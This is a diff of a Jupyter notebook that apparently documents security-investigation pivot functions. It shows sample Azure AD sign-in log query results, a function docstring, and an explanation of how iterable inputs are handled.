+       "      <td>Azure Advanced Threat Protection</td>\n",
+       "      <td>7b7531ad-5926-4f2d-8a1d-38495ad33e17</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>{'errorCode': 0}</td>\n",
+       "      <td></td>\n",
+       "      <td>AzureAD</td>\n",
+       "      <td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.427...</td>\n",
+       "      <td>Brandon</td>\n",
+       "      <td>9dadd76f-3237-4e1d-84e7-e45c59867492</td>\n",
+       "      <td>brandon@seccxpninja.onmicrosoft.com</td>\n",
+       "      <td>4b2462a4-bbee-495a-a0e1-f23ae524cc9c</td>\n",
+       "      <td>SigninLogs</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>Azure AD</td>\n",
+       "      <td>2020-10-01 13:02:35.003000+00:00</td>\n",
+       "      <td>/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam</td>\n",
+       "      <td>Sign-in activity</td>\n",
+       "      <td>1.0</td>\n",
+       "      <td>SignInLogs</td>\n",
+       "      <td>0</td>\n",
+       "      <td>None</td>\n",
+       "      <td></td>\n",
+       "      <td>0</td>\n",
+       "      <td>7ad7aeab-9b3e-4463-844a-e458cc3b1ae7</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td></td>\n",
+       "      <td>Brandon</td>\n",
+       "      <td>4</td>\n",
+       "      <td>US</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Advanced Threat Protection</td>\n",
+       "      <td>7b7531ad-5926-4f2d-8a1d-38495ad33e17</td>\n",
+       "      <td>[]</td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"key\": \"IsCAEToken\",\\r\\n    \"value\": \"False\"\\r\\n  }\\r\\n]</td>\n",
+       "      <td>singleFactorAuthentication</td>\n",
+       "      <td>...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{'city': 'Lewisville', 'state': 'Texas', 'countryOrRegion': 'US', 'geoCoordinates': {'latitude':...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>67780cc7-0610-409d-82c8-f9603b238100</td>\n",
+       "      <td>140</td>\n",
+       "      <td>none</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>Azure Advanced Threat Protection</td>\n",
+       "      <td>7b7531ad-5926-4f2d-8a1d-38495ad33e17</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>{'errorCode': 0}</td>\n",
+       "      <td></td>\n",
+       "      <td>AzureAD</td>\n",
+       "      <td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.427...</td>\n",
+       "      <td>Brandon</td>\n",
+       "      <td>9dadd76f-3237-4e1d-84e7-e45c59867492</td>\n",
+       "      <td>brandon@seccxpninja.onmicrosoft.com</td>\n",
+       "      <td>4b2462a4-bbee-495a-a0e1-f23ae524cc9c</td>\n",
+       "      <td>SigninLogs</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>Azure AD</td>\n",
+       "      <td>2020-10-01 12:02:29.023000+00:00</td>\n",
+       "      <td>/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam</td>\n",
+       "      <td>Sign-in activity</td>\n",
+       "      <td>1.0</td>\n",
+       "      <td>SignInLogs</td>\n",
+       "      <td>0</td>\n",
+       "      <td>None</td>\n",
+       "      <td></td>\n",
+       "      <td>0</td>\n",
+       "      <td>df38d091-bff5-49b4-8a4f-d37c0fd4f425</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td></td>\n",
+       "      <td>Brandon</td>\n",
+       "      <td>4</td>\n",
+       "      <td>US</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Advanced Threat Protection</td>\n",
+       "      <td>7b7531ad-5926-4f2d-8a1d-38495ad33e17</td>\n",
+       "      <td>[]</td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"key\": \"IsCAEToken\",\\r\\n    \"value\": \"False\"\\r\\n  }\\r\\n]</td>\n",
+       "      <td>singleFactorAuthentication</td>\n",
+       "      <td>...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{'city': 'Lewisville', 'state': 'Texas', 'countryOrRegion': 'US', 'geoCoordinates': {'latitude':...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>1c276715-4518-4b42-8a34-827162f17a00</td>\n",
+       "      <td>203</td>\n",
+       "      <td>none</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>Azure Advanced Threat Protection</td>\n",
+       "      <td>7b7531ad-5926-4f2d-8a1d-38495ad33e17</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>{'errorCode': 0}</td>\n",
+       "      <td></td>\n",
+       "      <td>AzureAD</td>\n",
+       "      <td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.427...</td>\n",
+       "      <td>Brandon</td>\n",
+       "      <td>9dadd76f-3237-4e1d-84e7-e45c59867492</td>\n",
+       "      <td>brandon@seccxpninja.onmicrosoft.com</td>\n",
+       "      <td>4b2462a4-bbee-495a-a0e1-f23ae524cc9c</td>\n",
+       "      <td>SigninLogs</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>Azure AD</td>\n",
+       "      <td>2020-10-01 11:02:23.922000+00:00</td>\n",
+       "      <td>/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam</td>\n",
+       "      <td>Sign-in activity</td>\n",
+       "      <td>1.0</td>\n",
+       "      <td>SignInLogs</td>\n",
+       "      <td>0</td>\n",
+       "      <td>None</td>\n",
+       "      <td></td>\n",
+       "      <td>0</td>\n",
+       "      <td>a80366d7-3efe-49ad-860d-8e9ebc53832f</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td></td>\n",
+       "      <td>Brandon</td>\n",
+       "      <td>4</td>\n",
+       "      <td>US</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Advanced Threat Protection</td>\n",
+       "      <td>7b7531ad-5926-4f2d-8a1d-38495ad33e17</td>\n",
+       "      <td>[]</td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"key\": \"IsCAEToken\",\\r\\n    \"value\": \"False\"\\r\\n  }\\r\\n]</td>\n",
+       "      <td>singleFactorAuthentication</td>\n",
+       "      <td>...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{'city': 'Lewisville', 'state': 'Texas', 'countryOrRegion': 'US', 'geoCoordinates': {'latitude':...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>0b713b33-d9a6-4045-9517-7160b9cdfe00</td>\n",
+       "      <td>147</td>\n",
+       "      <td>none</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>Azure Advanced Threat Protection</td>\n",
+       "      <td>7b7531ad-5926-4f2d-8a1d-38495ad33e17</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>{'errorCode': 0}</td>\n",
+       "      <td></td>\n",
+       "      <td>AzureAD</td>\n",
+       "      <td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.427...</td>\n",
+       "      <td>Brandon</td>\n",
+       "      <td>9dadd76f-3237-4e1d-84e7-e45c59867492</td>\n",
+       "      <td>brandon@seccxpninja.onmicrosoft.com</td>\n",
+       "      <td>4b2462a4-bbee-495a-a0e1-f23ae524cc9c</td>\n",
+       "      <td>SigninLogs</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>Azure AD</td>\n",
+       "      <td>2020-10-01 00:01:26.238000+00:00</td>\n",
+       "      <td>/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam</td>\n",
+       "      <td>Sign-in activity</td>\n",
+       "      <td>1.0</td>\n",
+       "      <td>SignInLogs</td>\n",
+       "      <td>0</td>\n",
+       "      <td>None</td>\n",
+       "      <td></td>\n",
+       "      <td>0</td>\n",
+       "      <td>5d1762b7-4eb7-4635-b27e-8dc3cf52babe</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td></td>\n",
+       "      <td>Brandon</td>\n",
+       "      <td>4</td>\n",
+       "      <td>US</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Advanced Threat Protection</td>\n",
+       "      <td>7b7531ad-5926-4f2d-8a1d-38495ad33e17</td>\n",
+       "      <td>[]</td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"key\": \"IsCAEToken\",\\r\\n    \"value\": \"False\"\\r\\n  }\\r\\n]</td>\n",
+       "      <td>singleFactorAuthentication</td>\n",
+       "      <td>...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{'city': 'Lewisville', 'state': 'Texas', 'countryOrRegion': 'US', 'geoCoordinates': {'latitude':...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>36949857-da9b-41c5-a694-14122cb16e00</td>\n",
+       "      <td>125</td>\n",
+       "      <td>none</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>Azure Advanced Threat Protection</td>\n",
+       "      <td>7b7531ad-5926-4f2d-8a1d-38495ad33e17</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>{'errorCode': 0}</td>\n",
+       "      <td></td>\n",
+       "      <td>AzureAD</td>\n",
+       "      <td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.427...</td>\n",
+       "      <td>Brandon</td>\n",
+       "      <td>9dadd76f-3237-4e1d-84e7-e45c59867492</td>\n",
+       "      <td>brandon@seccxpninja.onmicrosoft.com</td>\n",
+       "      <td>4b2462a4-bbee-495a-a0e1-f23ae524cc9c</td>\n",
+       "      <td>SigninLogs</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>5 rows × 59 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId SourceSystem  \\\n",
+       "0  8ecf8077-cf51-4820-aadd-14040956f35d     Azure AD   \n",
+       "1  8ecf8077-cf51-4820-aadd-14040956f35d     Azure AD   \n",
+       "2  8ecf8077-cf51-4820-aadd-14040956f35d     Azure AD   \n",
+       "3  8ecf8077-cf51-4820-aadd-14040956f35d     Azure AD   \n",
+       "4  8ecf8077-cf51-4820-aadd-14040956f35d     Azure AD   \n",
+       "\n",
+       "                     TimeGenerated  \\\n",
+       "0 2020-10-01 10:02:18.923000+00:00   \n",
+       "1 2020-10-01 13:02:35.003000+00:00   \n",
+       "2 2020-10-01 12:02:29.023000+00:00   \n",
+       "3 2020-10-01 11:02:23.922000+00:00   \n",
+       "4 2020-10-01 00:01:26.238000+00:00   \n",
+       "\n",
+       "                                                                 ResourceId  \\\n",
+       "0  /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam   \n",
+       "1  /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam   \n",
+       "2  /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam   \n",
+       "3  /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam   \n",
+       "4  /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam   \n",
+       "\n",
+       "      OperationName OperationVersion    Category ResultType ResultSignature  \\\n",
+       "0  Sign-in activity              1.0  SignInLogs          0            None   \n",
+       "1  Sign-in activity              1.0  SignInLogs          0            None   \n",
+       "2  Sign-in activity              1.0  SignInLogs          0            None   \n",
+       "3  Sign-in activity              1.0  SignInLogs          0            None   \n",
+       "4  Sign-in activity              1.0  SignInLogs          0            None   \n",
+       "\n",
+       "  ResultDescription  DurationMs                         CorrelationId  \\\n",
+       "0                             0  ac81524b-bb83-4a0a-a3f8-577a14dda295   \n",
+       "1                             0  7ad7aeab-9b3e-4463-844a-e458cc3b1ae7   \n",
+       "2                             0  df38d091-bff5-49b4-8a4f-d37c0fd4f425   \n",
+       "3                             0  a80366d7-3efe-49ad-860d-8e9ebc53832f   \n",
+       "4                             0  5d1762b7-4eb7-4635-b27e-8dc3cf52babe   \n",
+       "\n",
+       "           Resource     ResourceGroup ResourceProvider Identity Level  \\\n",
+       "0  Microsoft.aadiam  Microsoft.aadiam                   Brandon     4   \n",
+       "1  Microsoft.aadiam  Microsoft.aadiam                   Brandon     4   \n",
+       "2  Microsoft.aadiam  Microsoft.aadiam                   Brandon     4   \n",
+       "3  Microsoft.aadiam  Microsoft.aadiam                   Brandon     4   \n",
+       "4  Microsoft.aadiam  Microsoft.aadiam                   Brandon     4   \n",
+       "\n",
+       "  Location AlternateSignInName                    AppDisplayName  \\\n",
+       "0       US                      Azure Advanced Threat Protection   \n",
+       "1       US                      Azure Advanced Threat Protection   \n",
+       "2       US                      Azure Advanced Threat Protection   \n",
+       "3       US                      Azure Advanced Threat Protection   \n",
+       "4       US                      Azure Advanced Threat Protection   \n",
+       "\n",
+       "                                  AppId AuthenticationDetails  \\\n",
+       "0  7b7531ad-5926-4f2d-8a1d-38495ad33e17                    []   \n",
+       "1  7b7531ad-5926-4f2d-8a1d-38495ad33e17                    []   \n",
+       "2  7b7531ad-5926-4f2d-8a1d-38495ad33e17                    []   \n",
+       "3  7b7531ad-5926-4f2d-8a1d-38495ad33e17                    []   \n",
+       "4  7b7531ad-5926-4f2d-8a1d-38495ad33e17                    []   \n",
+       "\n",
+       "  AuthenticationMethodsUsed  \\\n",
+       "0                             \n",
+       "1                             \n",
+       "2                             \n",
+       "3                             \n",
+       "4                             \n",
+       "\n",
+       "                                            AuthenticationProcessingDetails  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"key\": \"IsCAEToken\",\\r\\n    \"value\": \"False\"\\r\\n  }\\r\\n]   \n",
+       "1  [\\r\\n  {\\r\\n    \"key\": \"IsCAEToken\",\\r\\n    \"value\": \"False\"\\r\\n  }\\r\\n]   \n",
+       "2  [\\r\\n  {\\r\\n    \"key\": \"IsCAEToken\",\\r\\n    \"value\": \"False\"\\r\\n  }\\r\\n]   \n",
+       "3  [\\r\\n  {\\r\\n    \"key\": \"IsCAEToken\",\\r\\n    \"value\": \"False\"\\r\\n  }\\r\\n]   \n",
+       "4  [\\r\\n  {\\r\\n    \"key\": \"IsCAEToken\",\\r\\n    \"value\": \"False\"\\r\\n  }\\r\\n]   \n",
+       "\n",
+       "    AuthenticationRequirement  ... IsRisky  \\\n",
+       "0  singleFactorAuthentication  ...    None   \n",
+       "1  singleFactorAuthentication  ...    None   \n",
+       "2  singleFactorAuthentication  ...    None   \n",
+       "3  singleFactorAuthentication  ...    None   \n",
+       "4  singleFactorAuthentication  ...    None   \n",
+       "\n",
+       "                                                                                       LocationDetails  \\\n",
+       "0  {'city': 'Lewisville', 'state': 'Texas', 'countryOrRegion': 'US', 'geoCoordinates': {'latitude':...   \n",
+       "1  {'city': 'Lewisville', 'state': 'Texas', 'countryOrRegion': 'US', 'geoCoordinates': {'latitude':...   \n",
+       "2  {'city': 'Lewisville', 'state': 'Texas', 'countryOrRegion': 'US', 'geoCoordinates': {'latitude':...   \n",
+       "3  {'city': 'Lewisville', 'state': 'Texas', 'countryOrRegion': 'US', 'geoCoordinates': {'latitude':...   \n",
+       "4  {'city': 'Lewisville', 'state': 'Texas', 'countryOrRegion': 'US', 'geoCoordinates': {'latitude':...   \n",
+       "\n",
+       "  MfaDetail NetworkLocationDetails                     OriginalRequestId  \\\n",
+       "0      None                     []  c2bcb991-75ad-42f4-a6c0-1a90686dfd00   \n",
+       "1      None                     []  67780cc7-0610-409d-82c8-f9603b238100   \n",
+       "2      None                     []  1c276715-4518-4b42-8a34-827162f17a00   \n",
+       "3      None                     []  0b713b33-d9a6-4045-9517-7160b9cdfe00   \n",
+       "4      None                     []  36949857-da9b-41c5-a694-14122cb16e00   \n",
+       "\n",
+       "  ProcessingTimeInMilliseconds  RiskDetail RiskEventTypes RiskEventTypes_V2  \\\n",
+       "0                          210        none             []                []   \n",
+       "1                          140        none             []                []   \n",
+       "2                          203        none             []                []   \n",
+       "3                          147        none             []                []   \n",
+       "4                          125        none             []                []   \n",
+       "\n",
+       "  RiskLevelAggregated RiskLevelDuringSignIn RiskState  \\\n",
+       "0                none                  none      none   \n",
+       "1                none                  none      none   \n",
+       "2                none                  none      none   \n",
+       "3                none                  none      none   \n",
+       "4                none                  none      none   \n",
+       "\n",
+       "                ResourceDisplayName                      ResourceIdentity  \\\n",
+       "0  Azure Advanced Threat Protection  7b7531ad-5926-4f2d-8a1d-38495ad33e17   \n",
+       "1  Azure Advanced Threat Protection  7b7531ad-5926-4f2d-8a1d-38495ad33e17   \n",
+       "2  Azure Advanced Threat Protection  7b7531ad-5926-4f2d-8a1d-38495ad33e17   \n",
+       "3  Azure Advanced Threat Protection  7b7531ad-5926-4f2d-8a1d-38495ad33e17   \n",
+       "4  Azure Advanced Threat Protection  7b7531ad-5926-4f2d-8a1d-38495ad33e17   \n",
+       "\n",
+       "  ServicePrincipalId ServicePrincipalName            Status TokenIssuerName  \\\n",
+       "0                                          {'errorCode': 0}                   \n",
+       "1                                          {'errorCode': 0}                   \n",
+       "2                                          {'errorCode': 0}                   \n",
+       "3                                          {'errorCode': 0}                   \n",
+       "4                                          {'errorCode': 0}                   \n",
+       "\n",
+       "  TokenIssuerType  \\\n",
+       "0         AzureAD   \n",
+       "1         AzureAD   \n",
+       "2         AzureAD   \n",
+       "3         AzureAD   \n",
+       "4         AzureAD   \n",
+       "\n",
+       "                                                                                             UserAgent  \\\n",
+       "0  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.427...   \n",
+       "1  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.427...   \n",
+       "2  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.427...   \n",
+       "3  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.427...   \n",
+       "4  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.427...   \n",
+       "\n",
+       "  UserDisplayName                                UserId  \\\n",
+       "0         Brandon  9dadd76f-3237-4e1d-84e7-e45c59867492   \n",
+       "1         Brandon  9dadd76f-3237-4e1d-84e7-e45c59867492   \n",
+       "2         Brandon  9dadd76f-3237-4e1d-84e7-e45c59867492   \n",
+       "3         Brandon  9dadd76f-3237-4e1d-84e7-e45c59867492   \n",
+       "4         Brandon  9dadd76f-3237-4e1d-84e7-e45c59867492   \n",
+       "\n",
+       "                     UserPrincipalName                           AADTenantId  \\\n",
+       "0  brandon@seccxpninja.onmicrosoft.com  4b2462a4-bbee-495a-a0e1-f23ae524cc9c   \n",
+       "1  brandon@seccxpninja.onmicrosoft.com  4b2462a4-bbee-495a-a0e1-f23ae524cc9c   \n",
+       "2  brandon@seccxpninja.onmicrosoft.com  4b2462a4-bbee-495a-a0e1-f23ae524cc9c   \n",
+       "3  brandon@seccxpninja.onmicrosoft.com  4b2462a4-bbee-495a-a0e1-f23ae524cc9c   \n",
+       "4  brandon@seccxpninja.onmicrosoft.com  4b2462a4-bbee-495a-a0e1-f23ae524cc9c   \n",
+       "\n",
+       "         Type  \n",
+       "0  SigninLogs  \n",
+       "1  SigninLogs  \n",
+       "2  SigninLogs  \n",
+       "3  SigninLogs  \n",
+       "4  SigninLogs  \n",
+       "\n",
+       "[5 rows x 59 columns]"
+      ]
+     },
+     "execution_count": 31,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "IpAddress.AzureSentinel.list_aad_signins_for_ip(ip_address_list=ip_list).head(5)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Using iterable values where the query function was designed to only accept single values\n",
+    "\n",
+    "In this case the pivot function will iterate through the values of the\n",
+    "iterable, making a separate query for each and then joining the results.\n",
+    "\n",
+    "We can see that this function only accepts a single value for \"account_name\"."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 32,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "\u001b[1;31mSignature:\u001b[0m \u001b[0mAccount\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mAzureSentinel\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mlist_aad_signins_for_account\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m*\u001b[0m\u001b[0margs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m->\u001b[0m \u001b[0mUnion\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mpandas\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mcore\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mframe\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mDataFrame\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mAny\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+       "\u001b[1;31mDocstring:\u001b[0m\n",
+       "Lists Azure AD Signins for Account\n",
+       "\n",
+       "Parameters\n",
+       "----------\n",
+       "account_name: str\n",
+       "    The account name to find\n",
+       "add_query_items: str (optional)\n",
+       "    Additional query clauses\n",
+       "end: datetime (optional)\n",
+       "    Query end time\n",
+       "start: datetime (optional)\n",
+       "    Query start time\n",
+       "    (default value is: -5)\n",
+       "table: str (optional)\n",
+       "    Table name\n",
+       "    (default value is: SigninLogs)\n",
+       "\u001b[1;31mFile:\u001b[0m      c:\\users\\ian\\anaconda3\\envs\\condadev\\lib\\functools.py\n",
+       "\u001b[1;31mType:\u001b[0m      function\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "Account.AzureSentinel.list_aad_signins_for_account?"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 33,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>ResourceId</th>\n",
+       "      <th>OperationName</th>\n",
+       "      <th>OperationVersion</th>\n",
+       "      <th>Category</th>\n",
+       "      <th>ResultType</th>\n",
+       "      <th>ResultSignature</th>\n",
+       "      <th>ResultDescription</th>\n",
+       "      <th>DurationMs</th>\n",
+       "      <th>CorrelationId</th>\n",
+       "      <th>Resource</th>\n",
+       "      <th>ResourceGroup</th>\n",
+       "      <th>ResourceProvider</th>\n",
+       "      <th>Identity</th>\n",
+       "      <th>Level</th>\n",
+       "      <th>Location</th>\n",
+       "      <th>AlternateSignInName</th>\n",
+       "      <th>AppDisplayName</th>\n",
+       "      <th>AppId</th>\n",
+       "      <th>AuthenticationDetails</th>\n",
+       "      <th>AuthenticationMethodsUsed</th>\n",
+       "      <th>AuthenticationProcessingDetails</th>\n",
+       "      <th>AuthenticationRequirement</th>\n",
+       "      <th>...</th>\n",
+       "      <th>IsRisky</th>\n",
+       "      <th>LocationDetails</th>\n",
+       "      <th>MfaDetail</th>\n",
+       "      <th>NetworkLocationDetails</th>\n",
+       "      <th>OriginalRequestId</th>\n",
+       "      <th>ProcessingTimeInMilliseconds</th>\n",
+       "      <th>RiskDetail</th>\n",
+       "      <th>RiskEventTypes</th>\n",
+       "      <th>RiskEventTypes_V2</th>\n",
+       "      <th>RiskLevelAggregated</th>\n",
+       "      <th>RiskLevelDuringSignIn</th>\n",
+       "      <th>RiskState</th>\n",
+       "      <th>ResourceDisplayName</th>\n",
+       "      <th>ResourceIdentity</th>\n",
+       "      <th>ServicePrincipalId</th>\n",
+       "      <th>ServicePrincipalName</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>TokenIssuerName</th>\n",
+       "      <th>TokenIssuerType</th>\n",
+       "      <th>UserAgent</th>\n",
+       "      <th>UserDisplayName</th>\n",
+       "      <th>UserId</th>\n",
+       "      <th>UserPrincipalName</th>\n",
+       "      <th>AADTenantId</th>\n",
+       "      <th>Type</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>Azure AD</td>\n",
+       "      <td>2020-10-01 11:04:42.689000+00:00</td>\n",
+       "      <td>/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam</td>\n",
+       "      <td>Sign-in activity</td>\n",
+       "      <td>1.0</td>\n",
+       "      <td>SignInLogs</td>\n",
+       "      <td>0</td>\n",
+       "      <td>None</td>\n",
+       "      <td></td>\n",
+       "      <td>0</td>\n",
+       "      <td>2e6fd17c-1227-433e-b3a3-80a74374a7dc</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td></td>\n",
+       "      <td>Ofer Shezaf</td>\n",
+       "      <td>4</td>\n",
+       "      <td>IL</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Portal</td>\n",
+       "      <td>c44b4083-3bb0-49c1-b47d-974e53cbdf3c</td>\n",
+       "      <td>[]</td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"key\": \"Login Hint Present\",\\r\\n    \"value\": \"True\"\\r\\n  },\\r\\n  {\\r\\n    \"key\":...</td>\n",
+       "      <td>multiFactorAuthentication</td>\n",
+       "      <td>...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{'city': 'Tiberias', 'state': 'Hazafon', 'countryOrRegion': 'IL', 'geoCoordinates': {'latitude':...</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>c8bfc04f-28bf-40b4-a9c1-07fd5bd9f800</td>\n",
+       "      <td>918</td>\n",
+       "      <td>none</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>Windows Azure Service Management API</td>\n",
+       "      <td>797f4846-ba00-4fd7-ba43-dac1f8f63013</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}</td>\n",
+       "      <td></td>\n",
+       "      <td>AzureAD</td>\n",
+       "      <td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.418...</td>\n",
+       "      <td>Ofer Shezaf</td>\n",
+       "      <td>9c459db5-0407-43fe-a2ea-126757297beb</td>\n",
+       "      <td>ofshezaf@microsoft.com</td>\n",
+       "      <td>4b2462a4-bbee-495a-a0e1-f23ae524cc9c</td>\n",
+       "      <td>SigninLogs</td>\n",
